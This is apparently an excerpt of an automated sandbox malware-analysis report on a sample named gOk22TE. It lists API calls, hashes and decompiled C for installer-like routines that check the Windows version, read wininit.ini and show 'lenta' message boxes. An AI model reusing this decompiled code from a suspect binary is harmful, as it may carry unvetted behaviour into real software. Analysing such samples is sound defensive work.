                                                                                                                                                                                                                                                • LocalFree.KERNEL32 ref: 010E3B13
                                                                                                                                                                                                                                                  • Part of subcall function 010E6517: FindResourceA.KERNEL32(010E0000,000007D6,00000005), ref: 010E652A
                                                                                                                                                                                                                                                  • Part of subcall function 010E6517: LoadResource.KERNEL32(010E0000,00000000,?,?,010E2EE8,00000000,010E19E0,00000547,0000083E,?,?,?,?,?,?,?), ref: 010E6538
                                                                                                                                                                                                                                                  • Part of subcall function 010E6517: DialogBoxIndirectParamA.USER32(010E0000,00000000,00000547,010E19E0,00000000), ref: 010E6557
                                                                                                                                                                                                                                                  • Part of subcall function 010E6517: FreeResource.KERNEL32(00000000,?,?,010E2EE8,00000000,010E19E0,00000547,0000083E,?,?,?,?,?,?,?,00000002), ref: 010E6560
                                                                                                                                                                                                                                                • LocalFree.KERNEL32(00000000,010E3100,00000000,00000000), ref: 010E3AF4
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000003.00000002.375753311.00000000010E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 010E0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000003.00000002.375741430.00000000010E0000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                                • Associated: 00000003.00000002.375787045.00000000010E8000.00000004.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                                • Associated: 00000003.00000002.375800762.00000000010EA000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                                • Associated: 00000003.00000002.375800762.00000000010EC000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_2_10e0000_gOk22TE.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Resource$Free$Local$FindLoad$AllocDialogErrorIndirectLastLockMessageParamSizeofStringlstrcmpmemcpy_s
                                                                                                                                                                                                                                                • String ID: <None>$LICENSE
                                                                                                                                                                                                                                                • API String ID: 2414642746-383193767
                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                C-Code - Quality: 94%
                                                                                                                                                                                                                                                			E010E24E0(void* __ebx) {
                                                                                                                                                                                                                                                				signed int _v8;
                                                                                                                                                                                                                                                				char _v268;
                                                                                                                                                                                                                                                				void* __edi;
                                                                                                                                                                                                                                                				void* __esi;
                                                                                                                                                                                                                                                				signed int _t7;
                                                                                                                                                                                                                                                				void* _t20;
                                                                                                                                                                                                                                                				long _t26;
                                                                                                                                                                                                                                                				signed int _t27;
                                                                                                                                                                                                                                                
                                                                                                                                                                                                                                                				_t20 = __ebx;
                                                                                                                                                                                                                                                				_t7 =  *0x10e8004; // 0x71a8563c
                                                                                                                                                                                                                                                				_v8 = _t7 ^ _t27;
                                                                                                                                                                                                                                                				_t25 = 0x104;
                                                                                                                                                                                                                                                				_t26 = 0;
                                                                                                                                                                                                                                                				if(GetWindowsDirectoryA( &_v268, 0x104) != 0) {
                                                                                                                                                                                                                                                					E010E658A( &_v268, 0x104, "wininit.ini");
                                                                                                                                                                                                                                                					WritePrivateProfileStringA(0, 0, 0,  &_v268);
                                                                                                                                                                                                                                                					_t25 = _lopen( &_v268, 0x40);
                                                                                                                                                                                                                                                					if(_t25 != 0xffffffff) {
                                                                                                                                                                                                                                                						_t26 = _llseek(_t25, 0, 2);
                                                                                                                                                                                                                                                						_lclose(_t25);
                                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                                				return E010E6CE0(_t26, _t20, _v8 ^ _t27, 0x104, _t25, _t26);
                                                                                                                                                                                                                                                			}












                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • GetWindowsDirectoryA.KERNEL32(?,00000104,00000000,00000000), ref: 010E2506
                                                                                                                                                                                                                                                • WritePrivateProfileStringA.KERNEL32(00000000,00000000,00000000,?), ref: 010E252C
                                                                                                                                                                                                                                                • _lopen.KERNEL32(?,00000040), ref: 010E253B
                                                                                                                                                                                                                                                • _llseek.KERNEL32(00000000,00000000,00000002), ref: 010E254C
                                                                                                                                                                                                                                                • _lclose.KERNEL32(00000000), ref: 010E2555
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000003.00000002.375753311.00000000010E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 010E0000, based on PE: true
• Associated: 00000003.00000002.375741430.00000000010E0000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.375787045.00000000010E8000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.375800762.00000000010EA000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.375800762.00000000010EC000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_2_10e0000_gOk22TE.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: DirectoryPrivateProfileStringWindowsWrite_lclose_llseek_lopen
                                                                                                                                                                                                                                                • String ID: wininit.ini
                                                                                                                                                                                                                                                • API String ID: 3273605193-4206010578
                                                                                                                                                                                                                                                • Opcode ID: 1412917e08582a7f474ee3dc00b2f26b05d90ea2c8170a07d6142079c4394b98
                                                                                                                                                                                                                                                • Instruction ID: 9034fc79c89149b6826f9f3278114a0c495d1395d270f6e36d586aadbc2af316
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 1412917e08582a7f474ee3dc00b2f26b05d90ea2c8170a07d6142079c4394b98
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: BF019632700118ABD7309A669D0CEDF7FFCDB95B60F000155FA85D7144DA794A418B90
                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                C-Code - Quality: 75%
                                                                                                                                                                                                                                                			E010E36EE(CHAR* __ecx) {
                                                                                                                                                                                                                                                				signed int _v8;
                                                                                                                                                                                                                                                				char _v268;
                                                                                                                                                                                                                                                				struct _OSVERSIONINFOA _v416;
                                                                                                                                                                                                                                                				signed int _v420;
                                                                                                                                                                                                                                                				signed int _v424;
                                                                                                                                                                                                                                                				CHAR* _v428;
                                                                                                                                                                                                                                                				CHAR* _v432;
                                                                                                                                                                                                                                                				signed int _v436;
                                                                                                                                                                                                                                                				CHAR* _v440;
                                                                                                                                                                                                                                                				void* __ebx;
                                                                                                                                                                                                                                                				void* __edi;
                                                                                                                                                                                                                                                				void* __esi;
                                                                                                                                                                                                                                                				signed int _t72;
                                                                                                                                                                                                                                                				CHAR* _t77;
                                                                                                                                                                                                                                                				CHAR* _t91;
                                                                                                                                                                                                                                                				CHAR* _t94;
                                                                                                                                                                                                                                                				int _t97;
                                                                                                                                                                                                                                                				CHAR* _t98;
                                                                                                                                                                                                                                                				signed char _t99;
                                                                                                                                                                                                                                                				CHAR* _t104;
                                                                                                                                                                                                                                                				signed short _t107;
                                                                                                                                                                                                                                                				signed int _t109;
                                                                                                                                                                                                                                                				short _t113;
                                                                                                                                                                                                                                                				void* _t114;
                                                                                                                                                                                                                                                				signed char _t115;
                                                                                                                                                                                                                                                				short _t119;
                                                                                                                                                                                                                                                				CHAR* _t123;
                                                                                                                                                                                                                                                				CHAR* _t124;
                                                                                                                                                                                                                                                				CHAR* _t129;
                                                                                                                                                                                                                                                				signed int _t131;
                                                                                                                                                                                                                                                				signed int _t132;
                                                                                                                                                                                                                                                				CHAR* _t135;
                                                                                                                                                                                                                                                				CHAR* _t138;
                                                                                                                                                                                                                                                				signed int _t139;
                                                                                                                                                                                                                                                
                                                                                                                                                                                                                                                				_t72 =  *0x10e8004; // 0x71a8563c
                                                                                                                                                                                                                                                				_v8 = _t72 ^ _t139;
                                                                                                                                                                                                                                                				_v416.dwOSVersionInfoSize = 0x94;
                                                                                                                                                                                                                                                				_t115 = __ecx;
                                                                                                                                                                                                                                                				_t135 = 0;
                                                                                                                                                                                                                                                				_v432 = __ecx;
                                                                                                                                                                                                                                                				_t138 = 0;
                                                                                                                                                                                                                                                				if(GetVersionExA( &_v416) != 0) {
                                                                                                                                                                                                                                                					_t133 = _v416.dwMajorVersion;
                                                                                                                                                                                                                                                					_t119 = 2;
                                                                                                                                                                                                                                                					_t77 = _v416.dwPlatformId - 1;
                                                                                                                                                                                                                                                					__eflags = _t77;
                                                                                                                                                                                                                                                					if(_t77 == 0) {
                                                                                                                                                                                                                                                						_t119 = 0;
                                                                                                                                                                                                                                                						__eflags = 1;
                                                                                                                                                                                                                                                						 *0x10e8184 = 1;
                                                                                                                                                                                                                                                						 *0x10e8180 = 1;
                                                                                                                                                                                                                                                						L13:
                                                                                                                                                                                                                                                						 *0x10e9a40 = _t119;
                                                                                                                                                                                                                                                						L14:
                                                                                                                                                                                                                                                						__eflags =  *0x10e8a34 - _t138; // 0x0
                                                                                                                                                                                                                                                						if(__eflags != 0) {
                                                                                                                                                                                                                                                							goto L66;
                                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                                						__eflags = _t115;
                                                                                                                                                                                                                                                						if(_t115 == 0) {
                                                                                                                                                                                                                                                							goto L66;
                                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                                						_v428 = _t135;
                                                                                                                                                                                                                                                						__eflags = _t119;
                                                                                                                                                                                                                                                						_t115 = _t115 + ((0 | _t119 != 0x00000000) - 0x00000001 & 0x0000003c) + 4;
                                                                                                                                                                                                                                                						_t11 =  &_v420;
                                                                                                                                                                                                                                                						 *_t11 = _v420 & _t138;
                                                                                                                                                                                                                                                						__eflags =  *_t11;
                                                                                                                                                                                                                                                						_v440 = _t115;
                                                                                                                                                                                                                                                						do {
                                                                                                                                                                                                                                                							_v424 = _t135 * 0x18;
                                                                                                                                                                                                                                                							_v436 = E010E2A89(_v416.dwMajorVersion, _v416.dwMinorVersion,  *((intOrPtr*)(_t135 * 0x18 + _t115)),  *((intOrPtr*)(_t135 * 0x18 + _t115 + 4)));
                                                                                                                                                                                                                                                							_t91 = E010E2A89(_v416.dwMajorVersion, _v416.dwMinorVersion,  *((intOrPtr*)(_v424 + _t115 + 0xc)),  *((intOrPtr*)(_v424 + _t115 + 0x10)));
                                                                                                                                                                                                                                                							_t123 = _v436;
                                                                                                                                                                                                                                                							_t133 = 0x54d;
                                                                                                                                                                                                                                                							__eflags = _t123;
                                                                                                                                                                                                                                                							if(_t123 < 0) {
                                                                                                                                                                                                                                                								L32:
                                                                                                                                                                                                                                                								__eflags = _v420 - 1;
                                                                                                                                                                                                                                                								if(_v420 == 1) {
                                                                                                                                                                                                                                                									_t138 = 0x54c;
                                                                                                                                                                                                                                                									L36:
                                                                                                                                                                                                                                                									__eflags = _t138;
                                                                                                                                                                                                                                                									if(_t138 != 0) {
                                                                                                                                                                                                                                                										L40:
                                                                                                                                                                                                                                                										__eflags = _t138 - _t133;
                                                                                                                                                                                                                                                										if(_t138 == _t133) {
                                                                                                                                                                                                                                                											L30:
                                                                                                                                                                                                                                                											_v420 = _v420 & 0x00000000;
                                                                                                                                                                                                                                                											_t115 = 0;
                                                                                                                                                                                                                                                											_v436 = _v436 & 0x00000000;
                                                                                                                                                                                                                                                											__eflags = _t138 - _t133;
                                                                                                                                                                                                                                                											_t133 = _v432;
                                                                                                                                                                                                                                                											if(__eflags != 0) {
                                                                                                                                                                                                                                                												_t124 = _v440;
                                                                                                                                                                                                                                                											} else {
                                                                                                                                                                                                                                                												_t124 = _t133[0x80] + 0x84 + _t135 * 0x3c + _t133;
                                                                                                                                                                                                                                                												_v420 =  &_v268;
                                                                                                                                                                                                                                                											}
                                                                                                                                                                                                                                                											__eflags = _t124;
                                                                                                                                                                                                                                                											if(_t124 == 0) {
                                                                                                                                                                                                                                                												_t135 = _v436;
                                                                                                                                                                                                                                                											} else {
                                                                                                                                                                                                                                                												_t99 = _t124[0x30];
                                                                                                                                                                                                                                                												_t135 = _t124[0x34] + 0x84 + _t133;
                                                                                                                                                                                                                                                												__eflags = _t99 & 0x00000001;
                                                                                                                                                                                                                                                												if((_t99 & 0x00000001) == 0) {
                                                                                                                                                                                                                                                													asm("sbb ebx, ebx");
                                                                                                                                                                                                                                                													_t115 =  ~(_t99 & 2) & 0x00000101;
                                                                                                                                                                                                                                                												} else {
                                                                                                                                                                                                                                                													_t115 = 0x104;
                                                                                                                                                                                                                                                												}
                                                                                                                                                                                                                                                											}
                                                                                                                                                                                                                                                											__eflags =  *0x10e8a38 & 0x00000001;
                                                                                                                                                                                                                                                											if(( *0x10e8a38 & 0x00000001) != 0) {
                                                                                                                                                                                                                                                												L64:
                                                                                                                                                                                                                                                												_push(0);
                                                                                                                                                                                                                                                												_push(0x30);
                                                                                                                                                                                                                                                												_push(_v420);
                                                                                                                                                                                                                                                												_push("lenta");
                                                                                                                                                                                                                                                												goto L65;
                                                                                                                                                                                                                                                											} else {
                                                                                                                                                                                                                                                												__eflags = _t135;
                                                                                                                                                                                                                                                												if(_t135 == 0) {
                                                                                                                                                                                                                                                													goto L64;
                                                                                                                                                                                                                                                												}
                                                                                                                                                                                                                                                												__eflags =  *_t135;
                                                                                                                                                                                                                                                												if( *_t135 == 0) {
                                                                                                                                                                                                                                                													goto L64;
                                                                                                                                                                                                                                                												}
                                                                                                                                                                                                                                                												MessageBeep(0);
                                                                                                                                                                                                                                                												_t94 = E010E681F(_t115);
                                                                                                                                                                                                                                                												__eflags = _t94;
                                                                                                                                                                                                                                                												if(_t94 == 0) {
                                                                                                                                                                                                                                                													L57:
                                                                                                                                                                                                                                                													0x180030 = 0x30;
                                                                                                                                                                                                                                                													L58:
                                                                                                                                                                                                                                                													_t97 = MessageBoxA(0, _t135, "lenta", 0x00180030 | _t115);
                                                                                                                                                                                                                                                													__eflags = _t115 & 0x00000004;
                                                                                                                                                                                                                                                													if((_t115 & 0x00000004) == 0) {
                                                                                                                                                                                                                                                														__eflags = _t115 & 0x00000001;
                                                                                                                                                                                                                                                														if((_t115 & 0x00000001) == 0) {
                                                                                                                                                                                                                                                															goto L66;
                                                                                                                                                                                                                                                														}
                                                                                                                                                                                                                                                														__eflags = _t97 - 1;
                                                                                                                                                                                                                                                														L62:
                                                                                                                                                                                                                                                														if(__eflags == 0) {
                                                                                                                                                                                                                                                															_t138 = 0;
                                                                                                                                                                                                                                                														}
                                                                                                                                                                                                                                                														goto L66;
                                                                                                                                                                                                                                                													}
                                                                                                                                                                                                                                                													__eflags = _t97 - 6;
                                                                                                                                                                                                                                                													goto L62;
                                                                                                                                                                                                                                                												}
                                                                                                                                                                                                                                                												_t98 = E010E67C9(_t124, _t124);
                                                                                                                                                                                                                                                												__eflags = _t98;
                                                                                                                                                                                                                                                												if(_t98 == 0) {
                                                                                                                                                                                                                                                													goto L57;
                                                                                                                                                                                                                                                												}
                                                                                                                                                                                                                                                												goto L58;
                                                                                                                                                                                                                                                											}
                                                                                                                                                                                                                                                										}
                                                                                                                                                                                                                                                										__eflags = _t138 - 0x54c;
                                                                                                                                                                                                                                                										if(_t138 == 0x54c) {
                                                                                                                                                                                                                                                											goto L30;
                                                                                                                                                                                                                                                										}
                                                                                                                                                                                                                                                										__eflags = _t138;
                                                                                                                                                                                                                                                										if(_t138 == 0) {
                                                                                                                                                                                                                                                											goto L66;
                                                                                                                                                                                                                                                										}
                                                                                                                                                                                                                                                										_t135 = 0;
                                                                                                                                                                                                                                                										__eflags = 0;
                                                                                                                                                                                                                                                										goto L44;
                                                                                                                                                                                                                                                									}
                                                                                                                                                                                                                                                									L37:
                                                                                                                                                                                                                                                									_t129 = _v432;
                                                                                                                                                                                                                                                									__eflags = _t129[0x7c];
                                                                                                                                                                                                                                                									if(_t129[0x7c] == 0) {
                                                                                                                                                                                                                                                										goto L66;
                                                                                                                                                                                                                                                									}
                                                                                                                                                                                                                                                									_t133 =  &_v268;
                                                                                                                                                                                                                                                									_t104 = E010E28E8(_t129,  &_v268, _t129,  &_v428);
                                                                                                                                                                                                                                                									__eflags = _t104;
                                                                                                                                                                                                                                                									if(_t104 != 0) {
                                                                                                                                                                                                                                                										goto L66;
                                                                                                                                                                                                                                                									}
                                                                                                                                                                                                                                                									_t135 = _v428;
                                                                                                                                                                                                                                                									_t133 = 0x54d;
                                                                                                                                                                                                                                                									_t138 = 0x54d;
                                                                                                                                                                                                                                                									goto L40;
                                                                                                                                                                                                                                                								}
                                                                                                                                                                                                                                                								goto L33;
                                                                                                                                                                                                                                                							}
                                                                                                                                                                                                                                                							__eflags = _t91;
                                                                                                                                                                                                                                                							if(_t91 > 0) {
                                                                                                                                                                                                                                                								goto L32;
                                                                                                                                                                                                                                                							}
                                                                                                                                                                                                                                                							__eflags = _t123;
                                                                                                                                                                                                                                                							if(_t123 != 0) {
                                                                                                                                                                                                                                                								__eflags = _t91;
                                                                                                                                                                                                                                                								if(_t91 != 0) {
                                                                                                                                                                                                                                                									goto L37;
                                                                                                                                                                                                                                                								}
                                                                                                                                                                                                                                                								__eflags = (_v416.dwBuildNumber & 0x0000ffff) -  *((intOrPtr*)(_v424 + _t115 + 0x14));
                                                                                                                                                                                                                                                								L27:
                                                                                                                                                                                                                                                								if(__eflags <= 0) {
                                                                                                                                                                                                                                                									goto L37;
                                                                                                                                                                                                                                                								}
                                                                                                                                                                                                                                                								L28:
                                                                                                                                                                                                                                                								__eflags = _t135;
                                                                                                                                                                                                                                                								if(_t135 == 0) {
                                                                                                                                                                                                                                                									goto L33;
                                                                                                                                                                                                                                                								}
                                                                                                                                                                                                                                                								_t138 = 0x54c;
                                                                                                                                                                                                                                                								goto L30;
                                                                                                                                                                                                                                                							}
                                                                                                                                                                                                                                                							__eflags = _t91;
                                                                                                                                                                                                                                                							_t107 = _v416.dwBuildNumber;
                                                                                                                                                                                                                                                							if(_t91 != 0) {
                                                                                                                                                                                                                                                								_t131 = _v424;
                                                                                                                                                                                                                                                								__eflags = (_t107 & 0x0000ffff) -  *((intOrPtr*)(_t131 + _t115 + 8));
                                                                                                                                                                                                                                                								if((_t107 & 0x0000ffff) >=  *((intOrPtr*)(_t131 + _t115 + 8))) {
                                                                                                                                                                                                                                                									goto L37;
                                                                                                                                                                                                                                                								}
                                                                                                                                                                                                                                                								goto L28;
                                                                                                                                                                                                                                                							}
                                                                                                                                                                                                                                                							_t132 = _t107 & 0x0000ffff;
                                                                                                                                                                                                                                                							_t109 = _v424;
                                                                                                                                                                                                                                                							__eflags = _t132 -  *((intOrPtr*)(_t109 + _t115 + 8));
                                                                                                                                                                                                                                                							if(_t132 <  *((intOrPtr*)(_t109 + _t115 + 8))) {
                                                                                                                                                                                                                                                								goto L28;
                                                                                                                                                                                                                                                							}
                                                                                                                                                                                                                                                							__eflags = _t132 -  *((intOrPtr*)(_t109 + _t115 + 0x14));
                                                                                                                                                                                                                                                							goto L27;
                                                                                                                                                                                                                                                							L33:
                                                                                                                                                                                                                                                							_t135 =  &(_t135[1]);
                                                                                                                                                                                                                                                							_v428 = _t135;
                                                                                                                                                                                                                                                							_v420 = _t135;
                                                                                                                                                                                                                                                							__eflags = _t135 - 2;
                                                                                                                                                                                                                                                						} while (_t135 < 2);
                                                                                                                                                                                                                                                						goto L36;
                                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                                					__eflags = _t77 == 1;
                                                                                                                                                                                                                                                					if(_t77 == 1) {
                                                                                                                                                                                                                                                						 *0x10e9a40 = _t119;
                                                                                                                                                                                                                                                						 *0x10e8184 = 1;
                                                                                                                                                                                                                                                						 *0x10e8180 = 1;
                                                                                                                                                                                                                                                						__eflags = _t133 - 3;
                                                                                                                                                                                                                                                						if(_t133 > 3) {
                                                                                                                                                                                                                                                							__eflags = _t133 - 5;
                                                                                                                                                                                                                                                							if(_t133 < 5) {
                                                                                                                                                                                                                                                								goto L14;
                                                                                                                                                                                                                                                							}
                                                                                                                                                                                                                                                							_t113 = 3;
                                                                                                                                                                                                                                                							_t119 = _t113;
                                                                                                                                                                                                                                                							goto L13;
                                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                                						_t119 = 1;
                                                                                                                                                                                                                                                						_t114 = 3;
                                                                                                                                                                                                                                                						 *0x10e9a40 = 1;
                                                                                                                                                                                                                                                						__eflags = _t133 - _t114;
                                                                                                                                                                                                                                                						if(__eflags < 0) {
                                                                                                                                                                                                                                                							L9:
                                                                                                                                                                                                                                                							 *0x10e8184 = _t135;
                                                                                                                                                                                                                                                							 *0x10e8180 = _t135;
                                                                                                                                                                                                                                                							goto L14;
                                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                                						if(__eflags != 0) {
                                                                                                                                                                                                                                                							goto L14;
                                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                                						__eflags = _v416.dwMinorVersion - 0x33;
                                                                                                                                                                                                                                                						if(_v416.dwMinorVersion >= 0x33) {
                                                                                                                                                                                                                                                							goto L14;
                                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                                						goto L9;
                                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                                					_t138 = 0x4ca;
                                                                                                                                                                                                                                                					goto L44;
                                                                                                                                                                                                                                                				} else {
                                                                                                                                                                                                                                                					_t138 = 0x4b4;
                                                                                                                                                                                                                                                					L44:
                                                                                                                                                                                                                                                					_push(_t135);
                                                                                                                                                                                                                                                					_push(0x10);
                                                                                                                                                                                                                                                					_push(_t135);
                                                                                                                                                                                                                                                					_push(_t135);
                                                                                                                                                                                                                                                					L65:
                                                                                                                                                                                                                                                					_t133 = _t138;
                                                                                                                                                                                                                                                					E010E44B9(0, _t138);
                                                                                                                                                                                                                                                					L66:
                                                                                                                                                                                                                                                					return E010E6CE0(0 | _t138 == 0x00000000, _t115, _v8 ^ _t139, _t133, _t135, _t138);
                                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                                			}





































                                                                                                                                                                                                                                                0x010e37ad
                                                                                                                                                                                                                                                0x010e37ae
                                                                                                                                                                                                                                                0x010e37b3
                                                                                                                                                                                                                                                0x010e37b8
                                                                                                                                                                                                                                                0x010e37b8
                                                                                                                                                                                                                                                0x010e37bf
                                                                                                                                                                                                                                                0x010e37bf
                                                                                                                                                                                                                                                0x010e37c5
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x010e37cb
                                                                                                                                                                                                                                                0x010e37cd
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x010e37d5
                                                                                                                                                                                                                                                0x010e37db
                                                                                                                                                                                                                                                0x010e37e8
                                                                                                                                                                                                                                                0x010e37ea
                                                                                                                                                                                                                                                0x010e37ea
                                                                                                                                                                                                                                                0x010e37ea
                                                                                                                                                                                                                                                0x010e37f0
                                                                                                                                                                                                                                                0x010e37f6
                                                                                                                                                                                                                                                0x010e3805
                                                                                                                                                                                                                                                0x010e3817
                                                                                                                                                                                                                                                0x010e382b
                                                                                                                                                                                                                                                0x010e3830
                                                                                                                                                                                                                                                0x010e3836
                                                                                                                                                                                                                                                0x010e383b
                                                                                                                                                                                                                                                0x010e383d
                                                                                                                                                                                                                                                0x010e38eb
                                                                                                                                                                                                                                                0x010e38eb
                                                                                                                                                                                                                                                0x010e38f2
                                                                                                                                                                                                                                                0x010e390c
                                                                                                                                                                                                                                                0x010e3911
                                                                                                                                                                                                                                                0x010e3911
                                                                                                                                                                                                                                                0x010e3913
                                                                                                                                                                                                                                                0x010e394d
                                                                                                                                                                                                                                                0x010e394d
                                                                                                                                                                                                                                                0x010e394f
                                                                                                                                                                                                                                                0x010e38a9
                                                                                                                                                                                                                                                0x010e38a9
                                                                                                                                                                                                                                                0x010e38b0
                                                                                                                                                                                                                                                0x010e38b2
                                                                                                                                                                                                                                                0x010e38b9
                                                                                                                                                                                                                                                0x010e38bb
                                                                                                                                                                                                                                                0x010e38c1
                                                                                                                                                                                                                                                0x010e3975
                                                                                                                                                                                                                                                0x010e38c7
                                                                                                                                                                                                                                                0x010e38de
                                                                                                                                                                                                                                                0x010e38e0
                                                                                                                                                                                                                                                0x010e38e0
                                                                                                                                                                                                                                                0x010e397b
                                                                                                                                                                                                                                                0x010e397d
                                                                                                                                                                                                                                                0x010e39a9
                                                                                                                                                                                                                                                0x010e397f
                                                                                                                                                                                                                                                0x010e3982
                                                                                                                                                                                                                                                0x010e398b
                                                                                                                                                                                                                                                0x010e398d
                                                                                                                                                                                                                                                0x010e398f
                                                                                                                                                                                                                                                0x010e399f
                                                                                                                                                                                                                                                0x010e39a1
                                                                                                                                                                                                                                                0x010e3991
                                                                                                                                                                                                                                                0x010e3991
                                                                                                                                                                                                                                                0x010e3991
                                                                                                                                                                                                                                                0x010e398f
                                                                                                                                                                                                                                                0x010e39af
                                                                                                                                                                                                                                                0x010e39b6
                                                                                                                                                                                                                                                0x010e3a0f
                                                                                                                                                                                                                                                0x010e3a0f
                                                                                                                                                                                                                                                0x010e3a11
                                                                                                                                                                                                                                                0x010e3a13
                                                                                                                                                                                                                                                0x010e3a19
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x010e39b8
                                                                                                                                                                                                                                                0x010e39b8
                                                                                                                                                                                                                                                0x010e39ba
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x010e39bc
                                                                                                                                                                                                                                                0x010e39bf
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x010e39c3
                                                                                                                                                                                                                                                0x010e39c9
                                                                                                                                                                                                                                                0x010e39ce
                                                                                                                                                                                                                                                0x010e39d0
                                                                                                                                                                                                                                                0x010e39e3
                                                                                                                                                                                                                                                0x010e39e5
                                                                                                                                                                                                                                                0x010e39e6
                                                                                                                                                                                                                                                0x010e39f1
                                                                                                                                                                                                                                                0x010e39f7
                                                                                                                                                                                                                                                0x010e39fa
                                                                                                                                                                                                                                                0x010e3a01
                                                                                                                                                                                                                                                0x010e3a04
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x010e3a06
                                                                                                                                                                                                                                                0x010e3a09
                                                                                                                                                                                                                                                0x010e3a09
                                                                                                                                                                                                                                                0x010e3a0b
                                                                                                                                                                                                                                                0x010e3a0b
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x010e3a09
                                                                                                                                                                                                                                                0x010e39fc
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x010e39fc
                                                                                                                                                                                                                                                0x010e39d3
                                                                                                                                                                                                                                                0x010e39d8
                                                                                                                                                                                                                                                0x010e39da
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000

                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • GetVersionExA.KERNEL32(?,00000000,?,?), ref: 010E3723
                                                                                                                                                                                                                                                • MessageBeep.USER32(00000000), ref: 010E39C3
                                                                                                                                                                                                                                                • MessageBoxA.USER32(00000000,00000000,lenta,00000030), ref: 010E39F1
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000003.00000002.375753311.00000000010E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 010E0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000003.00000002.375741430.00000000010E0000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                                • Associated: 00000003.00000002.375787045.00000000010E8000.00000004.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                                • Associated: 00000003.00000002.375800762.00000000010EA000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                                • Associated: 00000003.00000002.375800762.00000000010EC000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_2_10e0000_gOk22TE.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Message$BeepVersion
                                                                                                                                                                                                                                                • String ID: 3$lenta
                                                                                                                                                                                                                                                • API String ID: 2519184315-4216304122
                                                                                                                                                                                                                                                • Opcode ID: 00c24e1868ec33a14901fd5cb87269b519b39e5fc59e28b5cae30e5ec8f5b184
                                                                                                                                                                                                                                                • Instruction ID: b86db8c7c02e33c84da4193f86b6d672de55112a3b0a02a6e34a99d572567247
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 00c24e1868ec33a14901fd5cb87269b519b39e5fc59e28b5cae30e5ec8f5b184
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 7291B271E012159FEBB98A1BC9887EABFF5BB85704F0941EAC9C99F241D7358D80CB41
                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                C-Code - Quality: 83%
                                                                                                                                                                                                                                                			E010E6495(void* __ebx, void* __ecx, void* __esi, void* __eflags) {
                                                                                                                                                                                                                                                				signed int _v8;
                                                                                                                                                                                                                                                				char _v268;
                                                                                                                                                                                                                                                				void* __edi;
                                                                                                                                                                                                                                                				signed int _t9;
                                                                                                                                                                                                                                                				signed char _t14;
                                                                                                                                                                                                                                                				struct HINSTANCE__* _t15;
                                                                                                                                                                                                                                                				void* _t18;
                                                                                                                                                                                                                                                				CHAR* _t26;
                                                                                                                                                                                                                                                				void* _t27;
                                                                                                                                                                                                                                                				signed int _t28;
                                                                                                                                                                                                                                                
